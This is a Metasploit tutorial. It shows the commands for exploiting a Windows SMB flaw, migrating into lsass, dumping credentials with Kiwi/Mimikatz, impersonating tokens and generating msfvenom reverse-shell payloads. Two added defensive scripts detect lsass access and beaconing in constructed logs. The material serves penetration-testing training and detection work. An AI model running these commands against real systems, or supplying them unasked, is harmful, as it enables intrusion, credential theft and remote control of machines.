Metasploit is a hacking framework, much like a Swiss army knife, equipped with numerous tools for conducting a penetration test from start to finish. It covers a wide range of functionality, but this guide focuses on a few core components, particularly the automated exploitation features that simplify and accelerate the exploitation process.
Ethical Hacking Disclaimer
Remember, ethical hacking is about using your skills for legal and constructive purposes. Always ensure you have explicit permission before attempting any penetration testing.
Initial Steps: Finding Vulnerabilities
Before exploiting a system, you need to identify its vulnerabilities. This involves reconnaissance and enumeration; for instance, you can use Nmap to scan for open ports and the services running on them.
Launching Metasploit
To start Metasploit, use:
msfconsole -q
The -q flag suppresses the ASCII art, keeping your terminal neat.
Searching for Exploits
Use the search function to find relevant exploits. For example, if targeting an Apache vulnerability:
search apache 2.2.2
You can also search by CVE number or by any other term that identifies a specific vulnerable service.
A numbered list of matching modules appears. To select one by its number in the search results:
use [search result number]
Example:
use 0
You can also select a module by giving its full path:
use exploit/windows/smb/ms08_067_netapi
Setting Up and Running the Exploit
Once you’ve chosen a module, configure its options:
use exploit/windows/smb/ms08_067_netapi
set RHOST <target IP>
set LHOST <your IP>
set LPORT <listening port>
If you are unsure which options a module accepts, list them with:
options
Run the exploit with:
run
or
exploit
If the exploit succeeds (and you chose a Meterpreter payload), you get a Meterpreter session, which gives you extensive control over the target system.
Post-Exploitation
In the meterpreter shell, you can execute various commands such as:
getuid
shell
upload <local file> <remote path>
download <remote file> <local path>
Migrating Processes
Process migration helps in maintaining a stable connection and evading detection. To migrate into another process, first identify the process ID (PID) of the target process:
pgrep <process_name>
For example, to find the PID of the LSASS process:
pgrep lsass
Then, migrate to the identified process:
migrate <PID>
Replace <PID> with the actual process ID found in the previous step.
Once you have migrated into lsass, you can use Mimikatz.
Using Mimikatz to Dump Password Hashes
One of the powerful tools integrated within Metasploit is Mimikatz, known for its ability to extract plaintext passwords, hash dumps, and more from memory. Let's explore how to use Mimikatz through Metasploit to dump password hashes from a compromised system.
load kiwi
This command loads the Kiwi extension, providing access to Mimikatz commands.
To dump all password hashes from the system, use the following command:
creds_all
This command lists the password hashes for the users on the system, so you can see their hashed credentials.
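From the defender's side, migration into lsass and credential dumping through Kiwi both leave the same footprint: a process other than the usual Windows services opening lsass.exe, or starting a thread inside it. The script below is an added example (not code from Metasploit or from the original guide) that shows how that footprint can be flagged in Sysmon telemetry. The event lines are a constructed, simplified key="value" rendering of Sysmon Event ID 8 (CreateRemoteThread) and Event ID 10 (ProcessAccess); real Sysmon events are XML in the Windows event log, and the allowlist of source images is an assumption you would tune per host.

```python
"""Flag suspicious access to lsass.exe in constructed Sysmon-style events.

Added example for this guide, not code from Metasploit or the original post.
The event lines are a constructed, simplified key="value" rendering of Sysmon
Event ID 8 (CreateRemoteThread) and Event ID 10 (ProcessAccess). Real Sysmon
events arrive as XML in the Windows event log, so a production version would
parse that instead; the allowlist and field names are assumptions for the demo.
"""
import re
from dataclasses import dataclass

LSASS = r"c:\windows\system32\lsass.exe"

# Win32 process access-right bits relevant to injection and memory dumping.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020

# Assumed allowlist of images that routinely open lsass.exe; tune per host.
ALLOWED_SOURCE_IMAGES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
    r"c:\windows\system32\svchost.exe",
}

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    r'EventID="10" SourceImage="C:\Windows\System32\svchost.exe" TargetImage="C:\Windows\System32\lsass.exe" GrantedAccess="0x1000"',
    r'EventID="10" SourceImage="C:\Users\bob\AppData\Local\Temp\update.exe" TargetImage="C:\Windows\System32\lsass.exe" GrantedAccess="0x1010"',
    r'EventID="8" SourceImage="C:\Users\bob\AppData\Local\Temp\update.exe" TargetImage="C:\Windows\System32\lsass.exe"',
    r'EventID="10" SourceImage="C:\Windows\System32\notepad.exe" TargetImage="C:\Windows\System32\lsass.exe" GrantedAccess="0x1fffff"',
    r'EventID="10" SourceImage="C:\Windows\explorer.exe" TargetImage="C:\Windows\System32\notepad.exe" GrantedAccess="0x1fffff"',
]


@dataclass
class Finding:
    event_id: int
    source_image: str
    reason: str


_FIELD = re.compile(r'(\w+)="([^"]*)"')


def parse_event(line: str) -> dict:
    """Turn one key="value" line into a dict with typed EventID/GrantedAccess."""
    ev = dict(_FIELD.findall(line))
    ev["EventID"] = int(ev["EventID"])
    if "GrantedAccess" in ev:
        ev["GrantedAccess"] = int(ev["GrantedAccess"], 16)
    return ev


def analyze(lines):
    """Return a Finding for every event that looks like injection into, or
    credential access against, lsass.exe."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("TargetImage", "").lower() != LSASS:
            continue
        src = ev.get("SourceImage", "")
        if ev["EventID"] == 8:
            # A thread started in lsass.exe by another process: the footprint
            # of injecting into (migrating to) the process.
            findings.append(Finding(8, src, "remote thread created in lsass.exe"))
        elif ev["EventID"] == 10 and src.lower() not in ALLOWED_SOURCE_IMAGES:
            mask = ev["GrantedAccess"]
            if mask & (PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD):
                findings.append(Finding(10, src, f"write/thread access to lsass.exe (0x{mask:x})"))
            elif mask & PROCESS_VM_READ:
                # Read access to lsass memory is what credential dumping needs.
                findings.append(Finding(10, src, f"memory read access to lsass.exe (0x{mask:x})"))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"EID {f.event_id}: {f.reason} from {f.source_image}")
```

Run against the constructed sample, the script reports three findings: the read-only open of lsass.exe from a Temp-directory binary, the remote thread that same binary creates in lsass.exe, and notepad.exe requesting full access. The svchost.exe event is suppressed by the allowlist and the explorer.exe event targets a different process. In practice the allowlist needs care, since security agents and some management tools also open lsass.exe legitimately.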
Impersonating Tokens
You can also do token impersonation, which can be useful for maintaining access or escalating privileges further. To list available tokens, use:
list_tokens -u
This will display all user tokens available for impersonation. To impersonate a specific token, use:
impersonate_token <token>
Exploit Suggester
Additionally, you can escalate privileges using the Local Exploit Suggester. First, background the current Meterpreter session:
background
List your active sessions with:
sessions
The output shows each session's ID; by default, your first session is numbered 1.
To use the exploit suggestor:
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
This may provide a list of potential exploits to elevate your access.
Creating Reverse Shells with MSFVenom
Metasploit’s MSFVenom tool allows you to generate payloads for reverse shells:
msfvenom -p windows/meterpreter/reverse_https LHOST=<your IP> LPORT=443 -f aspx -o hacker.aspx
This is just one example of how to use MSFVenom. You can specify many other options, such as Linux targets, x64 architecture, non-Meterpreter shells, TCP transports, different file formats, and stageless payloads. For example, a standard (non-Meterpreter) reverse shell for an x64 Linux target could look like this:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your IP> LPORT=443 -f elf -o hacker.elf
Use tab completion to see what is available. Overall, MSFVenom is highly customizable.
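The reverse_https payload generated above calls back to its handler at regular intervals, so on the defending side a useful triage check is to look for hosts whose outbound connections to a given destination and port are unusually regular. The following script is an added example (not code from Metasploit or from the original guide) that groups connection-log entries by (source, destination, port), measures the gaps between connections and flags tuples with low jitter. The log format ("<ISO timestamp> <src> <dst> <dport>"), the sample lines, the addresses and the thresholds are all constructed assumptions for the demo.

```python
"""Spot periodic outbound connections (beaconing) in constructed connection logs.

Added example for this guide, not code from Metasploit or the original post.
The log format, sample lines, addresses and thresholds are constructed
assumptions for the demo.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

MIN_CONNECTIONS = 5      # fewer samples than this cannot establish a rhythm
MAX_JITTER_RATIO = 0.15  # stdev(gaps) / mean(gaps) at or below this is "regular"

# Constructed sample log: one host checking in every ~60 s, one host browsing
# irregularly, one host with too few connections to judge.
SAMPLE_LOG = [
    "2024-05-01T09:00:00 10.0.0.5 203.0.113.10 443",
    "2024-05-01T09:01:00 10.0.0.5 203.0.113.10 443",
    "2024-05-01T09:02:01 10.0.0.5 203.0.113.10 443",
    "2024-05-01T09:03:00 10.0.0.5 203.0.113.10 443",
    "2024-05-01T09:04:00 10.0.0.5 203.0.113.10 443",
    "2024-05-01T09:05:01 10.0.0.5 203.0.113.10 443",
    "2024-05-01T09:06:01 10.0.0.5 203.0.113.10 443",
    "2024-05-01T09:07:00 10.0.0.5 203.0.113.10 443",
    "2024-05-01T09:00:00 10.0.0.7 198.51.100.20 443",
    "2024-05-01T09:00:05 10.0.0.7 198.51.100.20 443",
    "2024-05-01T09:02:05 10.0.0.7 198.51.100.20 443",
    "2024-05-01T09:02:08 10.0.0.7 198.51.100.20 443",
    "2024-05-01T09:07:08 10.0.0.7 198.51.100.20 443",
    "2024-05-01T09:07:48 10.0.0.7 198.51.100.20 443",
    "2024-05-01T09:00:00 10.0.0.9 192.0.2.1 443",
    "2024-05-01T09:00:30 10.0.0.9 192.0.2.1 443",
]


def parse_line(line):
    """Split '<ISO timestamp> <src> <dst> <dport>' into typed fields."""
    ts, src, dst, dport = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport)


def find_beacons(lines):
    """Map (src, dst, dport) -> stats for tuples whose connection gaps are regular."""
    by_tuple = defaultdict(list)
    for line in lines:
        ts, src, dst, dport = parse_line(line)
        by_tuple[(src, dst, dport)].append(ts)

    beacons = {}
    for key, stamps in by_tuple.items():
        if len(stamps) < MIN_CONNECTIONS:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # duplicate timestamps; nothing periodic to measure
        jitter = pstdev(gaps) / avg
        if jitter <= MAX_JITTER_RATIO:
            beacons[key] = {
                "count": len(stamps),
                "interval_s": round(avg, 1),
                "jitter": round(jitter, 3),
            }
    return beacons


if __name__ == "__main__":
    for (src, dst, dport), stats in find_beacons(SAMPLE_LOG).items():
        print(f"{src} -> {dst}:{dport} every ~{stats['interval_s']}s "
              f"(jitter {stats['jitter']}, n={stats['count']})")
```

On the constructed sample only 10.0.0.5's connections to 203.0.113.10:443 are flagged (about every 60 seconds with almost no jitter); the irregular browsing host and the host with two connections are not. Treat this as a triage signal rather than a verdict: update checkers and mail clients also poll on a schedule, so the flagged destinations still need to be compared against known-good services, and a longer observation window with a looser jitter threshold catches check-ins that deliberately vary their timing.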
Wrapping Up
This guide covers only the basics of Metasploit. The framework offers a wealth of tools and capabilities to assist in ethical hacking.